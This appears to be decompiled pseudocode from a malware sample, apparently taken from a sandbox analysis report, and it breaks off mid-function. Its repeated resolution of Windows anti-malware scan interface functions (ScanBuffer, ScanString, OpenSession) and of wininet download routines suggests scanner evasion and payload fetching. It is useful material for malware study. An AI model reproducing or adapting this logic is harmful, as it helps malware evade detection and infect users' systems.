				char _v864;
				intOrPtr _v868;
				char _v872;
				char _v876;
				char _v880;
				intOrPtr _v884;
				char _v888;
				char _v892;
				char _v896;
				intOrPtr _v900;
				char _v904;
				char _v908;
				char _v912;
				intOrPtr _v916;
				char _v920;
				char _v924;
				char _v928;
				intOrPtr _v932;
				char _v936;
				char _v940;
				char _v944;
				intOrPtr _v948;
				char _v952;
				char _v956;
				char _v960;
				char _v964;
				intOrPtr _v968;
				char _v972;
				char _v976;
				char _v980;
				intOrPtr _v984;
				char _v988;
				char _v992;
				char _v996;
				intOrPtr _v1000;
				char _v1004;
				char _v1008;
				char _v1012;
				intOrPtr _v1016;
				char _v1020;
				char _v1024;
				intOrPtr _v1028;
				char _v1032;
				intOrPtr _v1036;
				char _v1040;
				char _v1044;
				char _v1048;
				intOrPtr _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				intOrPtr _v1080;
				char _v1084;
				char _v1088;
				char _v1092;
				intOrPtr _v1096;
				char _v1100;
				char _v1104;
				char _v1108;
				char _v1112;
				intOrPtr _v1116;
				char _v1120;
				char _v1124;
				char _v1128;
				intOrPtr _v1132;
				char _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				intOrPtr _v1164;
				char _v1168;
				char _v1172;
				void* _v1176;
				char _v1180;
				char _v1184;
				char _v1188;
				char _v1192;
				char _v1196;
				intOrPtr _v1200;
				char _v1204;
				char _v1240;
				intOrPtr _v1244;
				char _v1248;
				char _v1252;
				char _v1256;
				intOrPtr _v1260;
				char _v1264;
				char _v1268;
				char _v1272;
				intOrPtr _v1276;
				char _v1280;
				char _v1284;
				char _v1288;
				intOrPtr _v1292;
				char _v1296;
				char _v1300;
				char _v1304;
				char _v1308;
				intOrPtr _v1312;
				char _v1316;
				char _v1320;
				char _v1324;
				intOrPtr _v1328;
				char _v1332;
				char _v1336;
				char _v1340;
				char _v1344;
				intOrPtr _v1348;
				char _v1352;
				char _v1356;
				char _v1360;
				intOrPtr _v1364;
				char _v1368;
				char _v1372;
				char _v1376;
				char _v1380;
				char _v1384;
				intOrPtr _v1388;
				char _v1392;
				char _v1396;
				char _v1400;
				intOrPtr _v1404;
				char _v1408;
				char _v1412;
				char _v1416;
				intOrPtr _v1420;
				char _v1424;
				char _v1428;
				char _v1432;
				intOrPtr _v1436;
				char _v1440;
				char _v1444;
				intOrPtr _v1448;
				char _v1452;
				char _v1456;
				char _v1460;
				intOrPtr _v1464;
				char _v1468;
				char _v1472;
				char _v1476;
				char _v1480;
				intOrPtr _v1484;
				char _v1832;
				char _v2092;
				char _v2104;
				char _v2132;
				intOrPtr _v2136;
				char _v2140;
				char _v2144;
				char _v2148;
				intOrPtr _v2152;
				char _v2156;
				char _v2160;
				char _v2164;
				intOrPtr _v2168;
				char _v2172;
				char _v2176;
				char _v2180;
				intOrPtr _v2184;
				char _v2188;
				char _v2192;
				char _v2196;
				char _v2200;
				intOrPtr _v2204;
				char _v2208;
				char _v2212;
				char _v2216;
				intOrPtr _v2220;
				char _v2224;
				char _v2228;
				char _v2232;
				char _v2236;
				intOrPtr _v2240;
				char _v2244;
				char _v2248;
				char _v2252;
				intOrPtr _v2256;
				char _v2260;
				char _v2264;
				char _v2268;
				intOrPtr _v2272;
				char _v2276;
				char _v2280;
				char _v2284;
				intOrPtr _v2288;
				char _v2292;
				char _v2296;
				char _v2300;
				intOrPtr _v2304;
				char _v2308;
				char _v2312;
				char _v2316;
				intOrPtr _v2320;
				char _v2324;
				char _v2328;
				char _v2332;
				intOrPtr _v2336;
				char _v2340;
				char _v2344;
				char _v2348;
				intOrPtr _v2352;
				char _v2356;
				char _v2360;
				char _v2364;
				intOrPtr _v2368;
				char _v2372;
				char _v2376;
				char _v2380;
				intOrPtr _v2384;
				char _v2388;
				char _v2392;
				char _v2396;
				intOrPtr _v2400;
				char _v2404;
				char _v2408;
				char _v2412;
				intOrPtr _v2416;
				char _v2420;
				char _v2424;
				char _v2428;
				intOrPtr _v2432;
				char _v2436;
				char _v2440;
				char _v2444;
				intOrPtr _v2448;
				char _v2452;
				char _v2456;
				char _v2460;
				char _v2464;
				intOrPtr _v2468;
				char _v2472;
				char _v2476;
				char _v2480;
				intOrPtr _v2484;
				char _v2488;
				char _v2492;
				char _v2496;
				char _v2500;
				char _v2504;
				char _v2508;
				char _v2512;
				intOrPtr _v2516;
				char _v2520;
				char _v2524;
				char _v2528;
				intOrPtr _v2532;
				char _v2536;
				char _v2540;
				char _v2544;
				intOrPtr _v2548;
				char _v2552;
				char _v2556;
				char _v2560;
				char _v2564;
				char _v2568;
				char _v2572;
				char _v2576;
				intOrPtr _v2580;
				char _v2584;
				char _v2588;
				char _v2592;
				char _v2596;
				char _v2600;
				char _v2604;
				char _v2608;
				intOrPtr _v2612;
				char _v2616;
				char _v2620;
				char _v2624;
				intOrPtr _v2628;
				char _v2632;
				char _v2636;
				char _v2640;
				intOrPtr _v2644;
				char _v2648;
				char _v2652;
				char _v2656;
				intOrPtr _v2660;
				char _v2664;
				char _v2668;
				char _v2672;
				char _v2676;
				char _v2680;
				intOrPtr _v2684;
				char _v2688;
				char _v2692;
				char _v2696;
				char _v2700;
				char _v2704;
				char _v2708;
				char _v2712;
				char _v2716;
				char _v2720;
				intOrPtr _v2724;
				char _v2728;
				char _v2732;
				char _v2736;
				char _v2740;
				char _v2744;
				char _v2748;
				char _v2752;
				char _v2756;
				char _v2760;
				char _v2764;
				char _v2768;
				char _v2772;
				char _v2776;
				char _v2780;
				char _v2784;
				char _v2788;
				char _v2792;
				char _v2796;
				char _v2800;
				char _v2804;
				char _v2808;
				char _v2812;
				char _v2816;
				char _v2820;
				char _v2824;
				char _v2828;
				char _v2832;
				intOrPtr _v2836;
				char _v2840;
				char _v2844;
				char _v2848;
				char _v2852;
				char _v2856;
				char _v2860;
				char _v2864;
				char _v2868;
				char _v2872;
				char _v2876;
				char _v2880;
				char _v2884;
				char _v2888;
				char _v2892;
				char _v2896;
				char _v2900;
				void* _t1159;
				intOrPtr* _t1161;
				intOrPtr _t1320;
				intOrPtr _t1321;
				intOrPtr _t1337;
				void* _t1342;
				char* _t1390;
				intOrPtr* _t1399;
				void* _t1403;
				intOrPtr _t1408;
				void* _t1443;
				intOrPtr _t1444;
				intOrPtr _t1476;
				intOrPtr _t1578;
				signed char _t1579;
				intOrPtr _t1632;
				void* _t1633;
				intOrPtr _t1634;
				intOrPtr _t1652;
				intOrPtr _t1672;
				intOrPtr _t1770;
				intOrPtr _t1776;
				intOrPtr _t1777;
				intOrPtr _t1835;
				intOrPtr _t1893;
				intOrPtr _t1925;
				void* _t1926;
				intOrPtr _t1927;
				intOrPtr _t1959;
				intOrPtr _t2007;
				intOrPtr _t2037;
				intOrPtr _t2067;
				intOrPtr _t2097;
				void* _t2240;
				intOrPtr _t2302;
				intOrPtr _t2311;
				intOrPtr _t2320;
				intOrPtr _t2329;
				intOrPtr _t2338;
				intOrPtr _t2347;
				intOrPtr _t2356;
				intOrPtr _t2365;
				intOrPtr _t2374;
				intOrPtr _t2383;
				intOrPtr _t2392;
				intOrPtr _t2401;
				intOrPtr _t2424;
				intOrPtr _t2433;
				intOrPtr _t2442;
				intOrPtr _t2451;
				intOrPtr _t2460;
				intOrPtr _t2469;
				intOrPtr _t2478;
				intOrPtr _t2486;
				intOrPtr _t2488;
				intOrPtr* _t2491;
				intOrPtr _t2511;
				intOrPtr _t2513;
				intOrPtr* _t2516;
				void* _t2535;
				void* _t2536;
				intOrPtr _t2540;
				intOrPtr _t2542;
				intOrPtr _t2605;
				long _t2639;
				void* _t2669;
				intOrPtr* _t2714;
				void* _t2745;
				void* _t2761;
				intOrPtr* _t2784;
				intOrPtr* _t2788;
				intOrPtr* _t2824;
				intOrPtr* _t2831;
				intOrPtr _t2834;
				intOrPtr _t2836;
				intOrPtr _t2962;
				intOrPtr _t3054;
				CHAR* _t3055;
				intOrPtr _t3097;
				intOrPtr* _t3160;
				intOrPtr* _t3163;
				intOrPtr* _t3171;
				intOrPtr* _t3179;
				intOrPtr _t3181;
				intOrPtr* _t3188;
				intOrPtr _t3191;
				intOrPtr _t3235;
				intOrPtr _t3239;
				intOrPtr _t3241;
				intOrPtr _t3247;
				char* _t3337;
				intOrPtr _t3346;
				intOrPtr _t3376;
				intOrPtr* _t3377;
				intOrPtr _t3378;
				intOrPtr* _t3380;
				intOrPtr* _t3381;
				void* _t3383;
				intOrPtr _t3384;
				intOrPtr _t3385;
				intOrPtr _t3386;
				intOrPtr _t3387;
				intOrPtr _t3388;
				intOrPtr _t3389;
				intOrPtr _t3390;
				intOrPtr _t3391;
				intOrPtr _t3392;
				intOrPtr _t3393;
				intOrPtr _t3394;
				intOrPtr _t3397;
				intOrPtr _t3398;
				intOrPtr _t3399;
				intOrPtr _t3400;
				intOrPtr _t3403;
				intOrPtr _t3404;
				intOrPtr _t3405;
				intOrPtr _t3407;
				intOrPtr _t3408;
				intOrPtr _t3409;
				intOrPtr _t3410;
				intOrPtr _t3411;
				intOrPtr _t3412;
				intOrPtr _t3413;
				intOrPtr _t3414;
				intOrPtr _t3415;
				intOrPtr _t3418;
				intOrPtr _t3420;
				intOrPtr _t3421;
				intOrPtr _t3423;
				intOrPtr _t3424;
				intOrPtr _t3425;
				intOrPtr _t3426;
				intOrPtr _t3427;
				intOrPtr _t3428;
				intOrPtr _t3431;
				intOrPtr _t3432;
				intOrPtr _t3433;
				intOrPtr _t3434;
				intOrPtr _t3435;
				intOrPtr _t3436;
				intOrPtr _t3437;
				intOrPtr _t3438;
				intOrPtr _t3440;
				intOrPtr _t3441;
				intOrPtr _t3443;
				intOrPtr _t3444;
				intOrPtr _t3445;
				intOrPtr _t3446;
				intOrPtr _t3447;
				intOrPtr _t3448;
				intOrPtr _t3449;
				intOrPtr _t3450;
				intOrPtr _t3451;
				intOrPtr _t3452;
				intOrPtr _t3453;
				intOrPtr _t3454;
				intOrPtr _t3455;
				intOrPtr _t3456;
				intOrPtr _t3457;
				intOrPtr _t3458;
				intOrPtr _t3459;
				intOrPtr _t3460;
				intOrPtr _t3461;
				intOrPtr _t3462;
				intOrPtr _t3463;
				intOrPtr _t3464;
				intOrPtr _t3465;
				intOrPtr _t3466;
				intOrPtr _t3467;
				intOrPtr _t3468;
				intOrPtr _t3469;
				intOrPtr _t3470;
				intOrPtr _t3471;
				intOrPtr _t3472;
				intOrPtr _t3473;
				intOrPtr _t3474;
				intOrPtr _t3475;
				intOrPtr _t3476;
				intOrPtr _t3477;
				intOrPtr _t3478;
				intOrPtr _t3479;
				intOrPtr _t3480;
				intOrPtr _t3482;
				intOrPtr _t3483;
				intOrPtr _t3484;
				intOrPtr _t3485;
				intOrPtr _t3490;
				intOrPtr _t3491;
				intOrPtr _t3492;
				intOrPtr _t3493;
				intOrPtr _t3494;
				intOrPtr _t3495;
				intOrPtr _t3496;
				intOrPtr _t3497;
				intOrPtr _t3498;
				intOrPtr _t3499;
				intOrPtr _t3500;
				intOrPtr _t3501;
				intOrPtr _t3502;
				intOrPtr _t3503;
				intOrPtr _t3504;
				intOrPtr _t3505;
				intOrPtr _t3507;
				intOrPtr _t3508;
				intOrPtr _t3509;
				intOrPtr _t3510;
				intOrPtr _t3520;
				intOrPtr _t3521;
				intOrPtr _t3522;
				intOrPtr _t3523;
				intOrPtr _t3524;
				intOrPtr _t3525;
				intOrPtr _t3526;
				intOrPtr _t3528;
				void* _t3534;
				void* _t3539;
				void* _t3544;
				void* _t3549;
				void* _t3554;
				void* _t3559;
				void* _t3566;
				void* _t3572;
				void* _t3578;
				void* _t3583;
				void* _t3591;
				void* _t3597;
				void* _t3602;
				void* _t3607;
				void* _t3619;
				void* _t3626;
				void* _t3633;
				void* _t3638;
				void* _t3644;
				void* _t3649;
				void* _t3654;
				void* _t3659;
				void* _t3664;
				void* _t3670;
				void* _t3675;
				intOrPtr _t3676;
				intOrPtr _t3687;
				intOrPtr _t3689;
				void* _t3697;
				void* _t3704;
				void* _t3711;
				intOrPtr _t3712;
				void* _t3741;
				void* _t3746;
				void* _t3751;
				void* _t3756;
				void* _t3761;
				void* _t3769;
				void* _t3774;
				void* _t3779;
				void* _t3784;
				void* _t3790;
				void* _t3795;
				void* _t3800;
				void* _t3805;
				intOrPtr _t3806;
				void* _t3812;
				void* _t3817;
				void* _t3824;
				void* _t3829;
				void* _t3837;
				void* _t3842;
				void* _t3847;
				void* _t3853;
				void* _t3858;
				void* _t3864;
				void* _t3869;
				void* _t3875;
				void* _t3880;
				void* _t3886;
				void* _t3891;
				void* _t3896;
				void* _t3899;
				void* _t3902;
				void* _t3907;
				void* _t3910;
				void* _t3913;
				void* _t3918;
				void* _t3923;
				void* _t3928;
				void* _t3933;
				void* _t3937;
				void* _t3942;
				void* _t3945;
				void* _t3948;
				void* _t3951;
				void* _t3956;
				void* _t3959;
				void* _t3962;
				void* _t3965;
				void* _t3968;
				void* _t3971;
				void* _t3974;
				void* _t3977;
				void* _t3980;
				void* _t3983;
				void* _t3986;
				void* _t3989;
				void* _t3992;
				void* _t3997;
				void* _t4000;
				void* _t4003;
				void* _t4006;
				void* _t4009;
				void* _t4012;
				void* _t4015;
				void* _t4018;
				void* _t4026;
				void* _t4034;
				void* _t4044;
				void* _t4049;
				void* _t4055;
				void* _t4060;
				void* _t4067;
				void* _t4072;
				void* _t4077;
				void* _t4082;
				void* _t4087;
				void* _t4092;
				void* _t4097;
				void* _t4102;
				void* _t4107;
				void* _t4113;
				void* _t4118;
				void* _t4127;
				void* _t4132;
				intOrPtr _t4139;
				void* _t4147;
				void* _t4152;
				void* _t4157;
				void* _t4162;
				void* _t4169;
				void* _t4174;
				void* _t4179;
				void* _t4184;
				void* _t4189;
				void* _t4194;
				void* _t4199;
				void* _t4204;
				void* _t4211;
				void* _t4216;
				void* _t4220;
				void* _t4225;
				void* _t4230;
				void* _t4237;
				void* _t4242;
				void* _t4248;
				void* _t4253;
				intOrPtr _t4267;
				void* _t4272;
				void* _t4277;
				void* _t4282;
				void* _t4290;
				void* _t4293;
				void* _t4296;
				void* _t4299;
				void* _t4304;
				void* _t4309;
				void* _t4314;
				void* _t4319;
				intOrPtr _t4320;
				void* _t4328;
				intOrPtr _t4329;
				void* _t4332;
				intOrPtr _t4336;
				intOrPtr _t4337;
				intOrPtr* _t4345;
				void* _t4354;

				_t4354 = __fp0;
				_t4332 = __edi;
				_t3375 = __ebx;
				_t4336 = _t4337;
				_t3383 = 0x16a;
				goto L1;
				L12:
				_t1321 =  *0x21949d8; // 0x3d3c508
				E02174DC4(_t1321, _t3376 - 4, 1, 0x21949c4);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98( &_v196, E02174D64(_v200));
				_push(_v196);
				_t3397 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v208, _t3397, 0x218e77c);
				E02174A98( &_v204, E02174D64(_v208));
				_pop(_t3591); // executed
				E02183690(_v204, _t3376, _t3591, 0x2194b88);
				_t1337 =  *0x21949c4; // 0x3df33a0
				E02174A98( &_v212, E02174D64(_t1337));
				_t1342 = E021780F8(_v212);
				_t4343 = _t1342;
				if(_t1342 == 0) {
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v264, E02174D64(_v268));
					_push(_v264);
					_t3398 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v276, _t3398, 0x218e77c);
					E02174A98( &_v272, E02174D64(_v276));
					_pop(_t3597); // executed
					E02183690(_v272, _t3376, _t3597, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v280, E02174D64(_v284));
					_push(_v280);
					_t3399 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v292, _t3399, 0x218e77c);
					E02174A98( &_v288, E02174D64(_v292));
					_pop(_t3602); // executed
					E02183690(_v288, _t3376, _t3602, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v296, E02174D64(_v300));
					_push(_v296);
					_t3400 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v308, _t3400, 0x218e77c);
					E02174A98( &_v304, E02174D64(_v308));
					_pop(_t3607); // executed
					E02183690(_v304, _t3376, _t3607, 0x2194b88); // executed
					E02172FC4(E02177D88(0x218e810, __eflags),  &_v312);
					E02173300(0x21949dc, _v312, __eflags, _t4354);
					_t1390 =  *0x2190e88; // 0x219000c
					 *_t1390 = 0;
					E02172D28(E021736BC());
					E02174F90(0x2194b80, E02172D28(E021734CC(0x21949dc)));
					_t1399 =  *0x2194b80; // 0x7fdf0018
					_v192 = _t1399;
					_t3377 = _v192;
					__eflags = _t3377;
					if(_t3377 != 0) {
						_t3380 = _t3377 - 4;
						__eflags = _t3380;
						_t3377 =  *_t3380;
					}
					E02174DBC(0x2194b80);
					_t1403 = E02173454(0); // executed
					E02172D28(_t1403);
					E02172D28(E02173474(0x21949dc));
					_t1408 =  *0x2194b80; // 0x7fdf0018, executed
					E0218860C(_t1408, _t3377,  &_v316, 0x218e81c, _t4332, 0x2194b88); // executed
					_t3403 =  *0x21885d4; // 0x21885d8
					E02175A4C(0x2194b88, _t3403, _v316);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v320, E02174D64(_v324));
					_push(_v320);
					_t3404 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v332, _t3404, 0x218e77c);
					E02174A98( &_v328, E02174D64(_v332));
					_pop(_t3619); // executed
					E02183690(_v328, _t3377, _t3619, 0x2194b88); // executed
					E021748F4(0x2194b28,  *((intOrPtr*)( *0x2194b88 + 4)));
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v336, E02174D64(_v340));
					_push(_v336);
					_t3405 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v348, _t3405, 0x218e77c);
					E02174A98( &_v344, E02174D64(_v348));
					_pop(_t3626); // executed
					E02183690(_v344, _t3377, _t3626, 0x2194b88); // executed
					_t1443 = E02177D88(0x218e82c, __eflags);
					_t1444 =  *0x2194b28; // 0x3dcf378
					E02188E78(_t1444, _t3377,  &_v352, _t1443, 0x2194b88);
					E021748F4(0x2194bb4, _v352);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v356, E02174D64(_v360));
					_push(_v356);
					_t3407 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v368, _t3407, 0x218e77c);
					E02174A98( &_v364, E02174D64(_v368));
					_pop(_t3633); // executed
					E02183690(_v364, _t3377, _t3633, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("UacScan");
					E02174C24();
					E02174A98( &_v372, E02174D64(_v376));
					_push(_v372);
					_t3408 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v384, _t3408, 0x218e77c);
					E02174A98( &_v380, E02174D64(_v384));
					_pop(_t3638); // executed
					E02183690(_v380, _t3377, _t3638, 0x2194b88); // executed
					_t1476 =  *0x2194bb4; // 0x3dc8048
					__eflags = E02188BBC(_t1476, 0x218e848, __eflags);
					if(__eflags != 0) {
						_t3247 =  *0x2194bb4; // 0x3dc8048, executed
						E02188CBC(_t3247, _t3377, _t3408,  &_v388, 0x2194b88, __eflags); // executed
						E021748F4(0x2194b7c, _v388);
						E02174A98( &_v392, "InternetOpena");
						_push(_v392);
						E02174A98( &_v396, "wininet");
						_pop(_t4290);
						E02183690(_v396, _t3377, _t4290, 0x2194b88);
						E02174A98( &_v400, "InternetOpenUrl");
						_push(_v400);
						E02174A98( &_v404, "wininet");
						_pop(_t4293);
						E02183690(_v404, _t3377, _t4293, 0x2194b88);
						E02174A98( &_v408, "InternetReadFile");
						_push(_v408);
						E02174A98( &_v412, "wininet");
						_pop(_t4296);
						E02183690(_v412, _t3377, _t4296, 0x2194b88);
						E02174A98( &_v416, "InternetCloseHandle");
						_push(_v416);
						E02174A98( &_v420, "wininet");
						_pop(_t4299);
						E02183690(_v420, _t3377, _t4299, 0x2194b88);
						_push(0x218e77c);
						_push( *0x2194bb0);
						_push("OpenSession");
						E02174C24();
						E02174A98( &_v424, E02174D64(_v428));
						_push(_v424);
						_t3523 =  *0x2194bb0; // 0x3e01b38
						E02174BB0( &_v436, _t3523, 0x218e77c);
						E02174A98( &_v432, E02174D64(_v436));
						_pop(_t4304); // executed
						E02183690(_v432, _t3377, _t4304, 0x2194b88); // executed
					}
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v440, E02174D64(_v444));
					_push(_v440);
					_t3409 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v452, _t3409, 0x218e77c);
					E02174A98( &_v448, E02174D64(_v452));
					_pop(_t3644); // executed
					E02183690(_v448, _t3377, _t3644, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v456, E02174D64(_v460));
					_push(_v456);
					_t3410 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v468, _t3410, 0x218e77c);
					E02174A98( &_v464, E02174D64(_v468));
					_pop(_t3649); // executed
					E02183690(_v464, _t3377, _t3649, 0x2194b88); // executed
				} else {
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v216, E02174D64(_v220));
					_push(_v216);
					_t3524 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v228, _t3524, 0x218e77c);
					E02174A98( &_v224, E02174D64(_v228));
					_pop(_t4309);
					E02183690(_v224, _t3376, _t4309, 0x2194b88);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v232, E02174D64(_v236));
					_push(_v232);
					_t3525 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v244, _t3525, 0x218e77c);
					E02174A98( &_v240, E02174D64(_v244));
					_pop(_t4314);
					E02183690(_v240, _t3376, _t4314, 0x2194b88);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v248, E02174D64(_v252));
					_push(_v248);
					_t3526 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v260, _t3526, 0x218e77c);
					E02174A98( &_v256, E02174D64(_v260));
					_pop(_t4319);
					E02183690(_v256, _t3376, _t4319, 0x2194b88);
					_t4320 =  *0x21949c4; // 0x3df33a0
					E02173300(0x21949dc, _t4320, _t4343, _t4354);
					_t3337 =  *0x2190e88; // 0x219000c
					 *_t3337 = 0;
					E02172D28(E021736BC());
					E02174F90(0x2194b7c, E02172D28(E021734CC(0x21949dc)));
					_t3346 =  *0x2194b7c; // 0x3d65538
					_v192 = _t3346;
					_t3377 = _v192;
					if(_t3377 != 0) {
						_t3381 = _t3377 - 4;
						_t4345 = _t3381;
						_t3377 =  *_t3381;
					}
					E02174DBC(0x2194b7c);
					E02172D28(E02173454(0));
					E02172D28(E02173474(0x21949dc));
				}
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("Initialize");
				E02174C24();
				E02174A98( &_v472, E02174D64(_v476));
				_push(_v472);
				_t3411 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v484, _t3411, 0x218e77c);
				E02174A98( &_v480, E02174D64(_v484));
				_pop(_t3654); // executed
				E02183690(_v480, _t3377, _t3654, 0x2194b88); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98( &_v488, E02174D64(_v492));
				_push(_v488);
				_t3412 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v500, _t3412, 0x218e77c);
				E02174A98( &_v496, E02174D64(_v500));
				_pop(_t3659); // executed
				E02183690(_v496, _t3377, _t3659, 0x2194b88); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanString");
				E02174C24();
				E02174A98( &_v504, E02174D64(_v508));
				_push(_v504);
				_t3413 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v516, _t3413, 0x218e77c);
				E02174A98( &_v512, E02174D64(_v516));
				_pop(_t3664); // executed
				E02183690(_v512, _t3377, _t3664, 0x2194b88); // executed
				E021748F4(0x2194b40, 0x218e82c);
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("ScanBuffer");
				E02174C24();
				E02174A98( &_v520, E02174D64(_v524));
				_push(_v520);
				_t3414 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v532, _t3414, 0x218e77c);
				E02174A98( &_v528, E02174D64(_v532));
				_pop(_t3670); // executed
				E02183690(_v528, _t3377, _t3670, 0x2194b88); // executed
				_push(0x218e77c);
				_push( *0x2194bb0);
				_push("OpenSession");
				E02174C24();
				E02174A98( &_v536, E02174D64(_v540));
				_push(_v536);
				_t3415 =  *0x2194bb0; // 0x3e01b38
				E02174BB0( &_v548, _t3415, 0x218e77c);
				E02174A98( &_v544, E02174D64(_v548));
				_pop(_t3675); // executed
				E02183690(_v544, _t3377, _t3675, 0x2194b88);
				_t1578 =  *0x2194b7c; // 0x3d65538
				_t1579 = E02188BF8(_t1578, _t3377, _t4345);
				_t4346 = (_t1579 ^ 0x00000001) - 1;
				if((_t1579 ^ 0x00000001) != 1) {
					L62:
					__eflags = 0;
					_pop(_t3676);
					 *[fs:eax] = _t3676;
					_push(E0218E74C);
					E021748C4( &_v2900, 0x62);
					E021748C4( &_v2500, 2);
					E021748C4( &_v2508, 2);
					E021748C4( &_v2492, 0x61);
					E021748A0( &_v2092);
					E021748C4( &_v2104, 3);
					E021748C4( &_v1832, 0x5e);
					E021748C4( &_v1452, 3);
					E021748A0( &_v1456);
					E021748C4( &_v1440, 0x63);
					E021748C4( &_v1044, 0x64);
					E021748C4( &_v644, 9);
					_t3687 =  *0x21885d4; // 0x21885d8
					E02175A10( &_v608, _t3687);
					E021748C4( &_v604, 0x48);
					_t3689 =  *0x21885d4; // 0x21885d8
					E02175A10( &_v316, _t3689);
					E021748C4( &_v312, 0x11);
					E021748C4( &_v244, 0xd);
					return E021748C4( &_v188, 0x2e);
				} else {
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanBuffer");
					E02174C24();
					E02174A98( &_v552, E02174D64(_v556));
					_push(_v552);
					_t3418 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v564, _t3418, 0x218e77c);
					E02174A98( &_v560, E02174D64(_v564));
					_pop(_t3697); // executed
					E02183690(_v560, _t3377, _t3697, 0x2194b88);
					_t1632 =  *0x2194b40; // 0x3e01b78
					_t1633 = E02177D88(_t1632, _t4346);
					_t1634 =  *0x2194b7c; // 0x3d65538
					E02188F20(_t1634, _t3377,  &_v568, _t1633, _t4332, 0x2194b88);
					E021748F4(0x21949d8, _v568);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v572, E02174D64(_v576));
					_push(_v572);
					_t3420 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v584, _t3420, 0x218e77c);
					E02174A98( &_v580, E02174D64(_v584));
					_pop(_t3704); // executed
					E02183690(_v580, _t3377, _t3704, 0x2194b88); // executed
					_t1652 =  *0x21949d8; // 0x3d3c508
					E02188C58(_t1652, _t3420,  &_v588);
					E021748F4(0x21949d8, _v588);
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("ScanString");
					E02174C24();
					E02174A98( &_v592, E02174D64(_v596));
					_push(_v592);
					_t3421 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v604, _t3421, 0x218e77c);
					E02174A98( &_v600, E02174D64(_v604));
					_pop(_t3711); // executed
					E02183690(_v600, _t3377, _t3711, 0x2194b88); // executed
					_t3712 =  *0x2190ac8; // 0x7d8c0c
					E02174B28( &_v612, _t3712);
					_t1672 =  *0x21949d8; // 0x3d3c508
					E0218860C(_t1672, _t3377,  &_v608, _v612, _t4332, 0x2194b88);
					_t3423 =  *0x21885d4; // 0x21885d8
					E02175A4C(0x2194b88, _t3423, _v608);
					E021748F4(0x2194bdc,  *((intOrPtr*)( *0x2194b88 + 4)));
					E021748F4(0x2194bd4,  *((intOrPtr*)( *0x2194b88 + 8)));
					E021748F4(0x2194b74,  *((intOrPtr*)( *0x2194b88 + 0xc)));
					E021748F4(0x2194bd8,  *((intOrPtr*)( *0x2194b88 + 0x10)));
					E021748F4(0x2194bbc,  *((intOrPtr*)( *0x2194b88 + 0x14)));
					E021748F4(0x2194bc0,  *((intOrPtr*)( *0x2194b88 + 0x18)));
					E021748F4(0x2194bc4,  *((intOrPtr*)( *0x2194b88 + 0x1c)));
					E021748F4(0x2194bc8,  *((intOrPtr*)( *0x2194b88 + 0x20)));
					E021748F4(0x2194bcc,  *((intOrPtr*)( *0x2194b88 + 0x24)));
					E021748F4(0x2194b38,  *((intOrPtr*)( *0x2194b88 + 0x28)));
					E021748F4(0x2194b3c,  *((intOrPtr*)( *0x2194b88 + 0x2c)));
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("Initialize");
					E02174C24();
					E02174A98( &_v616, E02174D64(_v620));
					_push(_v616);
					_t3424 =  *0x2194bb0; // 0x3e01b38
					E02174BB0( &_v628, _t3424, 0x218e77c);
					E02174A98( &_v624, E02174D64(_v628));
					_pop(_t3741); // executed
					E02183690(_v624, _t3377, _t3741, 0x2194b88); // executed
					_push(0x218e77c);
					_push( *0x2194bb0);
					_push("OpenSession");
					E02174C24();
					E02174A98( &_v632, E02174D64(_v636));
					_push(_v632);
